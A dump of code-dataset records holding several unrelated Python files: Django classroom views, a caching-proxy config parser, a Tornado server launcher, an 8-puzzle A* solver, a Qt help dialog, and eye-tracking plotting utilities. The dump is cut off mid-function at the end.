level=self.object.level,\n turn=self.object.turn\n ).exists()\n\n if classroom_exists:\n messages.error(\n self.request,\n 'This classroom already exists.'\n )\n return super(ClassRoomCreateView, self).form_invalid(form)\n\n return super(ClassRoomCreateView, self).form_valid(form)\n\n\nclass ClassRoomUpdateView(LoginRequiredMixin, PermissionRequiredMixin, UpdateView):\n model = ClassRoom\n template_name = 'ecweb/classroom/update_classroom.html'\n permission_required = 'ecweb.view_all_classrooms'\n fields = (\n 'number_class',\n 'level',\n 'students',\n 'teachers',\n 'turn'\n )\n\n def form_valid(self, form):\n\n self.object = form.save(commit=False)\n form_changed = form.has_changed()\n\n if form_changed:\n classroom_exists = ClassRoom.objects.filter(\n number_class=self.object.number_class,\n level=self.object.level,\n turn=self.object.turn\n ).exists()\n\n if classroom_exists:\n messages.error(\n self.request,\n 'This classroom already exists.'\n )\n return super(ClassRoomUpdateView, self).form_invalid(form)\n else:\n messages.success(\n self.request,\n 'Classroom successfully updated'\n )\n\n return super(ClassRoomUpdateView, self).form_valid(form)\n\n messages.info(\n self.request,\n 'The classroom does changed.'\n )\n return super(ClassRoomUpdateView, self).form_valid(form)\n\n\nclass ClassRoomDeactivateView(LoginRequiredMixin, PermissionRequiredMixin, DeleteView):\n model = ClassRoom\n template_name = 'ecweb/classroom/classroom_confirm_delete.html'\n success_url = reverse_lazy('classroom_view')\n permission_required = 'ecweb.view_all_classrooms'\n\n def delete(self, request, *args, **kwargs):\n self.object = self.get_object()\n success_url = self.get_success_url()\n self.object.is_active = False\n self.object.save()\n\n return HttpResponseRedirect(success_url)\n\n\n@login_required\ndef list_classes_view(request, class_room_id):\n\n current_user = request.user\n user = Coordinator.objects.filter(user__id=current_user.id)\n if user:\n all_classes = Class.objects.filter(classroom=class_room_id)\n\n user = Teacher.objects.filter(user__id=current_user.id)\n if user:\n teacher = Teacher.objects.get(user=current_user.id)\n all_classes = Class.objects.filter(classroom__teachers=teacher.id)\n\n user = Student.objects.filter(user__id=current_user.id)\n if user:\n student = Student.objects.get(user=current_user.id)\n all_classes = Class.objects.filter(classroom__students=student.id)\n\n context = {\n 'all_classes': all_classes,\n 'current_user': current_user\n }\n return render(request, 'ecweb/classes.html', context)\n\n\n@login_required\ndef class_view(request, class_id):\n current_user = request.user\n class_obj = Class.objects.get(id=class_id)\n\n choices_student = []\n for student in class_obj.classroom.students.all():\n student_id = student.id\n student_name = '{}, {}'.format(\n student.user.last_name, student.user.first_name)\n choices_student.append((student_id, student_name))\n\n if request.method == 'POST':\n form = AttendanceForm(request.POST)\n form.fields['students'].choices = tuple(choices_student)\n\n if form.is_valid():\n students_to_update = [int(s)\n for s in form.cleaned_data['students']]\n class_obj.attendances.clear()\n class_obj.attendances.add(*students_to_update)\n\n return HttpResponseRedirect('/class')\n\n else:\n attendanced_students = [s.id for s in class_obj.attendances.all()]\n\n form = AttendanceForm(\n initial={'class_id': class_id, 'students': attendanced_students})\n form.fields['students'].choices = tuple(choices_student)\n\n context = {\n 'form': form,\n 'current_user': current_user,\n 'class_id': class_id,\n 'class_obj': class_obj\n }\n return render(request, 'ecweb/class_attendance.html', context)\n\n\n@login_required\ndef events_list_view(request):\n current_user = request.user\n events = Event.objects.all()\n\n return render(request, 'ecweb/events.html',\n {'current_user': current_user,\n 'events': events})","repo_name":"jamesperes-zz/EC","sub_path":"ecweb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12837,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"12188294450","text":"import configparser\nimport sys\nimport json\nimport httpantry.proxy_database as pr_db\nfrom pathlib import Path\nfrom flask import Response\n\nCONFIGURE_FILE = \"__httpantry_cache__/config\"\nTIME_DELTA = {\"days\": 86400000, \"hours\": 3600000, \"minutes\": 60000, \"seconds\": 1000, \"milliseconds\": 1}\n\nclass Configurations:\n def __init__(self):\n self.port_number = None\n self.response_file = None\n self.persistence = None\n self.uncached_apis = list()\n self.timeout = None\n self.store = None\n self.retrieve = None\n\ndef userConfiguration():\n \"\"\" Initializes the configuration \"\"\" \n configure_file = Path(CONFIGURE_FILE)\n if not configure_file.is_file():\n initConfigureFile()\n readConfigFile()\n\ndef readConfigFile():\n \"\"\" Reads a configuration file \"\"\"\n config = configparser.ConfigParser()\n config.read(CONFIGURE_FILE)\n\n for key in config['GENERAL']:\n evaluate_default_parameters(key, config['GENERAL'][key])\n user_params.timeout = 0\n\n for key in config['TIMEOUT']:\n if key in TIME_DELTA: \n user_params.timeout += TIME_DELTA[key] * int(config['TIMEOUT'][key])\n \n if config['CUSTOM_RESPONSES']['use_custom_responses'] == \"True\":\n evaluate_custom_responses_parameters(config['CUSTOM_RESPONSES']['file_name'])\n\ndef dynamically_config(request_json):\n \"\"\" Configures user_parameters with the specified parameter, json body, and user params \"\"\"\n for key in request_json.keys():\n if key == \"TIMEOUT\" or key == \"timeout\":\n user_params.timeout = 0\n for segment in request_json[key].keys():\n if segment in TIME_DELTA.keys():\n user_params.timeout += TIME_DELTA[segment] * int(request_json[key][segment])\n else:\n return False\n elif key == \"persistence\":\n if request_json[key] == \"True\" or request_json[key] == \"true\":\n user_params.persistence = True\n elif request_json[key] == \"False\" or request_json[key] == \"false\":\n user_params.persistence = False\n else:\n return False\n elif key == \"response_file\":\n if request_json[key] == \"False\" or request_json[key] == \"false\":\n user_params.response_file = False \n else:\n user_params.response_file = request_json[key]\n elif key == \"uncached_apis\":\n user_params.uncached_apis.append(request_json[key])\n else:\n return False\n return True\n\ndef evaluate_default_parameters(key, string):\n \"\"\" Converts from user-defined strings to parameters \"\"\"\n if key == \"port_number\":\n user_params.port_number = int(string)\n elif key == \"custom_response_file\":\n user_params.custom_response_file = string\n elif key == \"persistence\":\n if string == \"True\":\n user_params.store = pr_db.store\n user_params.retrieve = pr_db.retrieve\n else:\n user_params.store = pr_db.temp_store\n user_params.retrieve = pr_db.temp_retrieve\n elif key == \"uncached_apis\":\n user_params.uncached_apis = string.split(' ')\n\ndef evaluate_custom_responses_parameters(file_name):\n ''' stores files from custom responses file'''\n custom_responses_file = Path(file_name)\n if not custom_responses_file.is_file():\n # if file does not already exist, create it with some example data\n example_data = [{\n \"method\": \"GET\",\n \"url\": \"http://httpbin.org/get\",\n \"content\": {\n \"args\": {},\n \"headers\": {\n \"Accept\": \"*/*\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Host\": \"httpbin.org\",\n \"User-Agent\": \"python-requests/2.21.0\"\n },\n \"origin\": \"140.233.185.118, 140.233.185.118\",\n \"url\": \"https://httpbin.org/get\"\n }\n }]\n with open(file_name, 'x') as outfile:\n json.dump(example_data, outfile, indent=4)\n # read from file, format as response, store in database\n with open(file_name, 'r') as json_file:\n data = json.load(json_file)\n for custom_response in data:\n response = Response()\n response.content = json.dumps(custom_response[\"content\"])\n response.headers = custom_response[\"content\"][\"headers\"]\n user_params.store(custom_response[\"method\"], custom_response[\"url\"], response)\n\n\ndef initConfigureFile():\n \"\"\" Creates a configuration file with default parameters \"\"\"\n config = configparser.ConfigParser()\n config.add_section('GENERAL') \n config.set('GENERAL', 'port_number', '5000')\n config.set('GENERAL', 'persistence', 'True')\n config.set('GENERAL', 'uncached_apis', 'yourmom.com http://httpbin.org/image/jpeg')\n config.add_section('CUSTOM_RESPONSES')\n config.set('CUSTOM_RESPONSES', 'use_custom_responses', 'True')\n config.set('CUSTOM_RESPONSES', 'file_name', '__httpantry_cache__/custom_responses.json')\n config.add_section('TIMEOUT')\n config.set('TIMEOUT', 'days', '0')\n config.set('TIMEOUT', 'hours', '1')\n config.set('TIMEOUT', 'minutes', '0')\n config.set('TIMEOUT', 'seconds', '0')\n config.set('TIMEOUT', 'milliseconds', '0')\n with open(CONFIGURE_FILE, 'w') as configfile:\n config.write(configfile)\n configfile.close()\n\nuser_params = Configurations()\n","repo_name":"RowenFelt/httpantry","sub_path":"HTTPantry/parse_configuration.py","file_name":"parse_configuration.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25512970126","text":"# -*- coding:utf-8 -*- \n\nimport tornado.options\nfrom tornado import httpserver, ioloop, web\nfrom tornado.log import app_log\nfrom tornado.options import define, options\n\nfrom conf.config import SETTINGS, LCIC_LOGGING_LEVEL, LCIC_TERMINAL_SHOW_LOGGING, LCIC_DEFAULT_PORT\nfrom router import HANDLERS\n\n# 监听的端口\ndefine(\"port\", default=LCIC_DEFAULT_PORT, help=\"default run port\", type=int)\n# 日志文件名\ndefine(\"log_file_prefix\", default=\"lcic.log\", help=\"log file prefix\")\n# 配置日志输出级别\noptions.logging = LCIC_LOGGING_LEVEL\n# 控制台是否显示日志\noptions.log_to_stderr = LCIC_TERMINAL_SHOW_LOGGING\n\n\n# APP\nclass Application(web.Application):\n def __init__(self):\n # 路由\n handlers = HANDLERS\n # 配置\n settings = SETTINGS\n super(Application, self).__init__(handlers, **settings)\n\n\n# Main入口\nif __name__ == '__main__':\n # 监听命令栏输入\n tornado.options.parse_command_line()\n app_log.error('Starting system......')\n # 启动服务器线程\n http_server = httpserver.HTTPServer(Application())\n http_server.listen(options.port)\n app_log.error('>--- Success, listen on port: {0}, logging level: {1} ---<'.format(options.port, LCIC_LOGGING_LEVEL))\n # 线程阻塞超过多长时间抛出异常,秒\n # ioloop.IOLoop.current().set_blocking_log_threshold(1)\n # 启动服务\n ioloop.IOLoop.current().start()\n","repo_name":"solidworks1210/JustDemo","sub_path":"tornado_demo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30144281258","text":"# Model: Data Structure. Controller can send messages to it, andcurrentFeatureSelectionOption model can respond to message.\n# View : User interface elements. Controller can send messages to it. View can call methods from Controller when an event happens.\n# Controller: Ties View and Model together. turns UI responses into chages in data.\n\nfrom controller import *\nfrom tkinter import *\n\ndef main():\n root = Tk()\n app = Controller(root)\n root.mainloop() \n \nif __name__ == '__main__':\n main() ","repo_name":"mastermueez/ML-for-Dummies","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23364867762","text":"import copy\nfrom os import path, stat\nfrom typing import Match\n# Jared Matson\n# #1570490\n# Asn1.py\n# ***CURRENTLY RUNS infinitely, instruction on Eclass makes it look like the program will constantly ask for states to solve***\n\n# Given 9 numbers from 0-8 (e.g 1 8 2 0 4 3 7 6 5) will return said numbers as an initial state\n#[1 8 2]\n#[2 4]\n#[7 6 5]\n#for the 1-8 puzzle game. The program will then use A* pathfinding to find the least amount of steps to reach\n#the goal state by sliding the blocks up/down/left/right\n#[ 1 2]\n#[3 4 5]\n#[6 7 8]\n\n#class Node\n#This class represents a possible state in the puzzle\n# value = the value of the Node e.g\n#[1 8 2]\n#[2 4]\n#[7 6 5]\n#gvalue = the gValue of the Node, e.g the amount of moves it took to get to that state\n#parent = the parent Node or previous state of the node\n#direction = Direction the empty spot had to move to reach Node\nclass Node:\n def __init__(self, value, gvalue, parent, direction) -> None:\n self.value = value\n self.parent = parent\n self.h = 0\n self.f = 0\n self.g = gvalue\n self.direction = direction\n\n# def InitializeBoard()\n# Takes an input from the user e.g (e.g 1 8 2 0 4 3 7 6 5) and will create a 2d\n# array with the values to represent the puzzle\ndef initializeBoard():\n board = []\n row = []\n goalState = [[0,1,2],[3,4,5],[6,7,8]]\n boardInput = input(\"Enter nine numbers\")\n for number in range(18): #going around spaces\n if number % 2 == 0:\n row.append(int(boardInput[number])) \n if len(row) == 3: #create new row if 3 numbers already in the current row\n board.append(row)\n row = []\n start = Node(board,0,None, \"\") #initialize root of tree\n solvePuzzle(start, goalState)\n\n# def printBoard(board)\n# Will iterate through the puzzle (2d array) and will print the \n# values to better represent what the 8 number puzzle actually looks like\n\n# Parameters:\n# board - the board being printed\n\n# Returns:\n# N/A\ndef printboard(board):\n for row in board:\n for value in row:\n if value == 0:\n print(\" \", end='')\n else:\n print(str(value) + \" \", end='')\n print(\"\")\n\n# def solvePuzzle(boardState, goalState)\n# Controls the flow of the program, will call upon multiple functions to find appropriate moves in the puzzle, as well\n# as which one is most optimal using A*\n\n# Parameters:\n# boardState - the initial state wanting to be solved\n# goalState - the goal state wanting to be reached\n\n# Returns:\n# N/A\ndef solvePuzzle(boardState, goalState):\n alreadyTraveledStates = [] #Previous states\n nextMoveList = [] #list of possible next moves in a given state\n GValue = 0\n AStarQueue = [boardState] \n goalFound = False\n while(len(AStarQueue) != 0):\n nextAction = AStarQueue.pop(0)\n alreadyTraveledStates.append(nextAction) #if value is popped out of AStarQueue, we know it is now an already travelled state\n GValue = nextAction.g + 1\n if(nextAction.value == goalState):\n printGoalPath(nextAction) #print solution path\n goalFound = True\n break\n else:\n for action in possibleActions(nextAction, alreadyTraveledStates, GValue): #find the possible actions in the current state, not including previously traversed states\n nextMoveList.append(action)\n AStarQueue = sortQueueUsingManhattan(AStarQueue, nextMoveList) #sort the newly found nodes into the AStarQueue \n nextMoveList.clear()#newly found nodes have been appended, now we dont need them anymore\n \n if(goalFound == False):\n print(\"No solution\")\n\n# def printGoalPath(goalNode)\n# Since the goalNode has been found, the path to get to this Node can easily be printed by printing each Nodes parent until we reach the root\n\n# Parameters:\n# goalNode - the goal Node that was found\n\n# Returns:\n# N/A\ndef printGoalPath(goalNode):\n pathList = []\n while(goalNode.parent != None): #We are at the bottom of the tree, and we want to print from the top down, not the bottom up\n pathList.insert(0,goalNode) #We can easier print the states from the root to the goal node if we just add it to a list to flip the order\n goalNode = goalNode.parent\n pathList.insert(0,goalNode) #add root node\n print(\"(Initial)\")\n for i in range(len(pathList)): #Print now in order list\n print(\"Move \"+ str(i),end=\"\")\n print(\" \",end=\"\")\n print(pathList[i].direction)\n printboard(pathList[i].value)\n print(\" \")\n print(\"============================\")\n print(\"Total number of moves: \" + str(len(pathList) - 1))\n print(\"============================\")\n \n# def sortQueueUsingMangattan(queue, movesToSortIntoQueue)\n# given the current AStarQueue and the potential states that can be taken,\n# will use A* to move the potential states into the prexisting AStarQueue\n\n# Parameters:\n# queue - the curent A* queue\n# movesToSortIntoQueue - potential states that can be taken from the current node\n\n# Returns:\n# updated A* queue \ndef sortQueueUsingManhattan(queue, movesToSortIntoQueue):\n #f(n) = g(n) + h(n)\n HValue = 0\n FValue = 0\n #list of coordinates for each number in their goal state\n oneGoal = (0,1)\n twoGoal = (0,2)\n threeGoal = (1,0)\n fourGoal = (1,1)\n fiveGoal = (1,2)\n sixGoal = (2,0)\n sevenGoal = (2,1)\n eightGoal = (2,2)\n for state in movesToSortIntoQueue:#for each move that can be taken\n value = state.value #grab the 2d array value from the Node\n HValue = 0\n FValue = 0\n #iterate through the 2d array, when you find each number, calculate manhattan distance\n for row in range(3):\n for col in range(3):\n if value[row][col] == 1:\n HValue += abs(oneGoal[0] - row)\n HValue += abs(oneGoal[1] - col)\n elif value[row][col] == 2:\n HValue += abs(twoGoal[0] - row)\n HValue += abs(twoGoal[1] - col)\n elif value[row][col] == 3:\n HValue += abs(threeGoal[0] - row)\n HValue += abs(threeGoal[1] - col)\n elif value[row][col] == 4:\n HValue += abs(fourGoal[0] - row)\n HValue += abs(fourGoal[1] - col)\n elif value[row][col] == 5:\n HValue += abs(fiveGoal[0] - row)\n HValue += abs(fiveGoal[1] - col)\n elif value[row][col] == 6:\n HValue += abs(sixGoal[0] - row)\n HValue += abs(sixGoal[1] - col)\n elif value[row][col] == 7:\n HValue += abs(sevenGoal[0] - row)\n HValue += abs(sevenGoal[1] - col)\n elif value[row][col] == 8:\n HValue += abs(eightGoal[0] - row)\n HValue += abs(eightGoal[1] - col)\n FValue = state.g + HValue\n state.f = FValue\n if(len(queue)) == 0: #if the queue is empty, just insert it into front\n queue.append(state)\n else:\n valueInserted = False\n for i in range(len(queue)): #iterate through the queue, put potential move into queue based on F value\n if(queue[i].f >= FValue): #if the current value in queue has an F value greater than the F value of the potential action we are looking at\n queue.insert((i), state)\n valueInserted = True \n break\n if(valueInserted == False): #if no other F value is greater than current value, put on end\n queue.append(state)\n return(queue)\n\n# def possibleActions(currentState, alreadyTraveledStates, Gvalue)\n# given the current Node and a list of already already travelled states, will determine\n# other potential moves that can be made\n\n# Parameters:\n# currentState - the Node we want to branch out from\n# alreadyTraveledStates - a list of nodes already explored\n# G value that will be assigned to any created nodes \n\n# Returns:\n# list of new Nodes that will later be sorted by sortQueueUsingManhattan()\n\ndef possibleActions(currentState, alreadyTraveledStates, Gvalue):\n currentStateValue = currentState.value #grab the 2d array value from the node\n possibleActionsList = []\n NewZeroLocations = []\n directionTravelled = []\n ZeroRow = -1 \n ZeroCol = -1\n for row in range(3): #find where the empty tile is\n for col in range(3):\n if currentStateValue[row][col] == 0:\n ZeroRow = row\n ZeroCol = col\n\n \n moveZeroUp = [ZeroRow -1, ZeroCol] #coords of the empty stone if it moved up\n moveZeroDown = [ZeroRow + 1, ZeroCol] #coords of the empty stone if it moved down\n moveZeroRight = [ZeroRow, ZeroCol + 1] #coords of the empty stone if it moved right\n moveZeroLeft = [ZeroRow, ZeroCol - 1] #coords of the empty stone if it moved left\n\n #boundary check, if in bounds, add to a list\n if(moveZeroUp[0] > -1):\n NewZeroLocations.append(moveZeroUp)\n directionTravelled.append(\"(Move blank tile up)\")\n if(moveZeroDown[0] < 3):\n NewZeroLocations.append(moveZeroDown)\n directionTravelled.append(\"(Move blank tile down)\")\n if(moveZeroRight[1] < 3):\n NewZeroLocations.append(moveZeroRight)\n directionTravelled.append(\"(Move blank tile right)\")\n if(moveZeroLeft[1] > -1):\n NewZeroLocations.append(moveZeroLeft)\n directionTravelled.append(\"(Move blank tile left)\")\n #these are the places the empty stone can move\n #for each of these options, we will find what the new board state is\n for option in NewZeroLocations:\n possibleActionTemp = copy.deepcopy(currentStateValue) #giving same address \n temp = currentStateValue[option[0]][option[1]] #get value that is to be swapped with 0\n possibleActionTemp[option[0]][option[1]] = 0 #put zero into that spot\n possibleActionTemp[ZeroRow][ZeroCol] = temp #put the temporary value into the zero position\n duplicateFound = False\n for i in range(len(alreadyTraveledStates)): #make sure this state has not already been explored\n if(alreadyTraveledStates[i].value == possibleActionTemp):\n duplicateFound = True\n if(duplicateFound == True):\n if(len(directionTravelled) > 0):\n directionTravelled.pop(0) #we want to make sure the node we create has the right direction, if a duplicate is found, we have to pop its direction too\n continue\n else:\n possibleActionsList.append(Node(possibleActionTemp, Gvalue, currentState, directionTravelled.pop(0))) #duplicate found, make a new Node \n \n return(possibleActionsList) #return list of Nodes with new states\n\n#program runs infinitely as of right now... manually terminate to stop\nwhile True:\n initializeBoard()\n","repo_name":"Matsonj30/A-PathFindingNumberPuzzle","sub_path":"asn1.py","file_name":"asn1.py","file_ext":"py","file_size_in_byte":10970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19794409418","text":"\"\"\"Module about basic help.\"\"\"\n\nfrom qtpy.QtGui import QPixmap\nfrom qtpy.QtWidgets import QDialog, QGridLayout, QLabel, QPushButton\n\n\nclass HelpDialog(QDialog):\n \"\"\"Display basic help.\"\"\"\n\n def __init__(self, icons, icon_size, short_desc, long_desc, parent=None):\n \"\"\"Initialize the HelpDialog.\"\"\"\n super().__init__(parent)\n\n assert len(icons.values()) == len(short_desc) == len(long_desc)\n\n layout = QGridLayout()\n for idx, icon in enumerate(icons.values()):\n pix = QPixmap(icon.pixmap(*icon_size))\n label = QLabel()\n label.setPixmap(pix)\n layout.addWidget(label, idx, 0)\n layout.addWidget(QLabel('' + short_desc[idx] + ''), idx, 1)\n layout.addWidget(QLabel(long_desc[idx]), idx, 2)\n\n self.ok_button = QPushButton(\"OK\")\n self.ok_button.clicked.connect(self.close)\n layout.addWidget(self.ok_button, idx + 1, 0, 1, 3)\n\n self.setWindowTitle(\"Help\")\n self.setModal(True)\n self.setLayout(layout)\n","repo_name":"GuillaumeFavelier/blockbuilder","sub_path":"blockbuilder/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"14133699674","text":"import operator, itertools as it\n\nimport numpy as np\nimport scipy, pandas\nimport matplotlib\nfrom matplotlib import pyplot, cm\nfrom matplotlib.ticker import MultipleLocator, FuncFormatter, FixedFormatter\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom PIL import Image, ImageDraw, ImageEnhance\nfrom StringIO import StringIO\n\nfrom kelly_colors import kelly_colors, kelly_colors_alpha\nfrom ..aoi import get_aoi_kinds, kind_to_col, envelope, make_grid, hit_test, hit_point, scanpath_from_fixations\nfrom ..util import contrast_color, significant, make_heatmap, angle_between, steady_state\nfrom ..stats import permute_correlation_matrix\nfrom ..metrics import time_between_fixes\n\n# AOI plots {{{\n\ndef draw_rectangles(aoi_rectangles, screen_image, colors=None,\n outline=\"black\", alpha=0.5, color_func=None):\n \"\"\"Draws AOI rectangles on to an image.\n \n Parameters\n ----------\n aoi_rectangles : pandas DataFrame\n DataFrame with a row for each rectangle (x, y, width, height columns)\n\n screen_image : PIL Image\n Image on top of which AOI rectangles will be drawn\n\n colors : list or None, optional\n List of PIL fill colors for each AOI kind. Colors will by cycled through\n if there are more AOI kinds than colors. If None, kelly_colors are used.\n Default is None (kelly_colors).\n\n outline : str or callable, optional\n Rectangle outline color (default is 'black'). If callable, the function\n is called for each rectangle with the AOI's kind, name, and local id.\n\n alpha : float, optional\n Transparency of AOI rectangles (0-1, 1 = opaque).\n Default is 0.5 (50% transparency).\n\n color_func : callable or None, optional\n Function to determine rectangle fill color. If not None, this function\n is used instead of colors. Called for each rectangle with the AOI's\n kind, name, and local id. Default is None (use colors).\n\n Returns\n -------\n img : PIL Image\n Screen image with AOI rectangles drawn on top\n \n \"\"\"\n rect_image = Image.new(\"RGBA\", screen_image.size)\n draw = ImageDraw.Draw(rect_image)\n\n if colors is None:\n colors = kelly_colors\n colors = it.cycle(colors)\n\n if color_func is None:\n color_func = lambda k, n, li: colors.next()\n\n if not callable(outline):\n outline_color = outline\n outline = lambda k, n, li: outline_color\n\n row_cols = [\"x\", \"y\", \"width\", \"height\", \"name\", \"local_id\"]\n for kind, kind_rows in aoi_rectangles.groupby(\"kind\"):\n for x, y, w, h, name, local_id in kind_rows[row_cols].values:\n draw.rectangle([(x, y), (x + w - 1, y + h - 1)],\n fill=color_func(kind, name, local_id),\n outline=outline(kind, name, local_id))\n\n del draw\n\n # Extract alpha channel and increase from 0 to alpha parameter\n rect_alpha = rect_image.split()[3]\n rect_image.putalpha(ImageEnhance.Brightness(rect_alpha).enhance(alpha))\n\n # Blend on to screen image with alpha\n return Image.composite(rect_image, screen_image, rect_image)\n\ndef aoi_transitions(trans_matrix, name_map=None,\n show_probs=True, ax=None, cmap=None,\n figsize=None, show_colorbar=True,\n prob_threshold=0.0, min_size=(5, 4)): \n \"\"\"Plots an AOI transition matrix with a colorbar.\n\n See also\n --------\n aoi.transition_matrix\n\n aoi.scanpath_from_fixations\n \n \"\"\"\n rows = np.arange(trans_matrix.shape[0])\n cols = np.arange(trans_matrix.shape[1])\n\n if ax is None:\n if figsize is None:\n w, h = trans_matrix.shape[:2]\n figsize = (max(min_size[0], w * 0.75),\n max(min_size[1], h * 0.5))\n pyplot.figure(figsize=figsize)\n ax = pyplot.axes()\n\n if cmap is None:\n cmap = cm.gist_gray_r\n\n polys = ax.pcolor(trans_matrix, cmap=cmap,\n edgecolors=\"#000000\", vmin=0, vmax=1)\n ax.set_title(\"AOI Transitions\")\n\n # x-axis\n ax.set_xlim(0, len(cols))\n ax.set_xticks(cols + 0.5)\n\n if name_map is None:\n ax.set_xticklabels(cols)\n else:\n ax.set_xticklabels([name_map[c] for c in cols])\n pyplot.setp(ax.get_xticklabels(), rotation=90)\n\n ax.set_xlabel(\"To AOI\")\n\n # y-axis\n ax.set_ylim(0, len(rows))\n ax.set_yticks(rows + 0.5)\n\n if name_map is None:\n ax.set_yticklabels(rows)\n else:\n ax.set_yticklabels([name_map[r] for r in rows])\n\n ax.set_ylabel(\"From AOI\")\n ax.invert_yaxis()\n \n # Probability colorbar\n if show_colorbar:\n cb = ax.figure.colorbar(polys)\n cb.set_label(\"Transition Probability\")\n\n # Probability text labels\n if show_probs:\n for row in rows:\n for col in cols:\n prob = trans_matrix[row, col]\n if prob > prob_threshold:\n cell_rgba = cmap(prob)\n text_color = contrast_color(cell_rgba)\n ax.text(col + 0.5, row + 0.5, \"{0:0.2f}\".format(prob),\n ha=\"center\", va=\"center\", color=text_color)\n\n return ax\n\ndef aoi_barplot(fixations, method=\"time\", ylabel=None,\n scalar=1e-3, aoi_kinds=None, ax=None, figsize=None):\n \"\"\"Plots fixation time or counts for all AOI kinds and names.\n\n Parameters\n ----------\n fixations : pandas DataFrame\n DataFrame with one row per fixation and AOI hits. Must have duration_ms\n and start_ms columns.\n \n method : str or callable, optional\n Method for determining height of bars. May be one of:\n * 'time' - total fixation duration\n * 'count' - number of fixations\n * 'first' - time of first fixation\n or a callable with 2 argments (frame, column) where\n * frame is the fixations DataFrame\n * column is the name of the AOI column\n that returns the height of the bar for the given AOI.\n Default is 'time'.\n\n ylabel : str or None, optional\n Label used for the y-axis. If None, a label is chosen depending on the\n method (time, count, or first).\n\n scalar : float, optional\n Number used to scale the height of bars. This is 0.001 by default,\n meaning time units will be in seconds rather than milliseconds.\n\n aoi_kinds : str or list, optional\n AOI kinds to plot. If None (default), all kinds are plotted.\n\n ax : matplotlib Axes or None, optional\n An Axes to plot onto or None to create a new one (default: None)\n\n figsize : tuple or None, optional\n Size of figure in inches when creating new Axes (width, height).\n If None, default figsize is used (default: None).\n\n Returns\n -------\n ax : matplotlib Axes\n\n \"\"\"\n\n if ax is None:\n pyplot.figure(figsize=figsize)\n ax = pyplot.axes()\n\n if aoi_kinds is None:\n aoi_kinds = get_aoi_kinds(fixations)\n elif isinstance(aoi_kinds, str):\n aoi_kinds = [aoi_kinds]\n\n colors = it.cycle(kelly_colors)\n\n if method == \"time\":\n method = lambda f, c: f[[c, \"duration_ms\"]]\\\n .groupby(c)[\"duration_ms\"].sum()\n ylabel = ylabel or \"Duration (sec)\"\n elif method == \"first\":\n method = lambda f, c: f[[c, \"start_ms\"]]\\\n .groupby(c)[\"start_ms\"].sum()\n ylabel = ylabel or \"First Fixation (sec)\"\n elif method == \"count\":\n method = lambda f, c: f[[c]]\\\n .groupby(c).size()\n ylabel = ylabel or \"Fixation Count\"\n scalar = 1.0\n\n bottom_start = 0\n xticks = []\n xlabels = []\n width = 1.0\n for kind, color in zip(aoi_kinds, colors):\n col = kind_to_col(kind)\n times = method(fixations, col) * scalar\n ind = np.arange(len(times)) + bottom_start\n data = np.array(times)\n ax.bar(ind, data, width=width, color=color, label=kind)\n \n for i, name in enumerate(times.index):\n xticks.append(bottom_start + (width / 1.75) + i)\n xlabels.append(name)\n \n bottom_start += len(times) + 2\n\n ax.set_title(\"Fixations by AOI\")\n ax.set_xlim(-1, len(xticks) + (len(aoi_kinds) * 2) - 1)\n ax.set_xticks(xticks)\n ax.set_xticklabels(xlabels, rotation=90)\n\n ax.grid()\n\n if ylabel is not None:\n ax.set_ylabel(ylabel)\n\n ax.legend(bbox_to_anchor=(1.1, 1.05))\n\n return ax\n\n# }}}\n\n# Fixation plots {{{\n\ndef fix_circles(fixations, screen_image, radius_min=10, radius_max=35, fill=\"red\",\n outline=\"black\", alpha=0.8, saccade_lines=True, line_fill=None):\n \"\"\"Draws fixation circles on an image with optional saccade lines.\n\n Circle radii are scaled by fixation duration, with the longest fixation mapping\n to radius_max and the shortest mapping to radius_min.\n \n Parameters\n ----------\n fixations : pandas DataFrame\n DataFrame with fixations and fix_x, fix_y, start_ms, duration_ms columns\n\n screen_image : PIL Image\n Image on top of which fixation circles will be drawn\n\n radius_min : int, optional\n Minimum radius of fixation circles (pixels)\n\n radius_max : int, optional\n Maximum radius of fixation circles (pixels)\n\n fill : str, optional\n PIL fill color of the fixation circles (default: 'red')\n\n outline : str, optional\n PIL outline color for fixation circles (default: 'black')\n\n alpha : float, optional\n Transparency of fixation circles (0-1, 1 = opaque).\n Default is 0.8 (20% transparent).\n\n saccade_lines : bool, optional\n If True, draw saccade lines between each fixation circle.\n Default is True.\n\n line_fill : str or None, optional\n Color of saccade lines or None to use fill color.\n Default is None.\n\n Returns\n -------\n img : PIL Image\n Screen image with fixation circles and saccade lines drawn on top.\n \n \"\"\"\n poly_image = Image.new(\"RGBA\", screen_image.size, (0, 0, 0, 0))\n draw = ImageDraw.Draw(poly_image)\n min_duration, max_duration = fixations.duration_ms.min(), fixations.duration_ms.max()\n\n if radius_min > radius_max:\n radius_max = radius_min\n\n if line_fill is None:\n line_fill = fill\n\n # Draw fixation circles\n last_xy = None\n for _, fix in fixations.sort(\"start_ms\").iterrows():\n x, y = fix[\"fix_x\"], fix[\"fix_y\"]\n\n # Draw saccade line\n if saccade_lines and last_xy:\n draw.line((last_xy[0], last_xy[1], x, y), fill=line_fill)\n\n # Calculate circle radius (transform from duration to radius)\n r = (radius_min + \n ((radius_max - radius_min) *\n ((fix[\"duration_ms\"] - min_duration) / float(max_duration - min_duration))\n )\n )\n\n # Happens if all fixations have the same duration\n if np.isnan(r):\n r = radius_min\n\n bbox = (x - r, y - r, x + r, y + r)\n draw.ellipse(bbox, fill=fill, outline=outline)\n last_xy = (x, y)\n\n # Flush drawing operations\n del draw\n\n # Extract alpha channel and increase from 0 to alpha parameter\n poly_alpha = poly_image.split()[3]\n 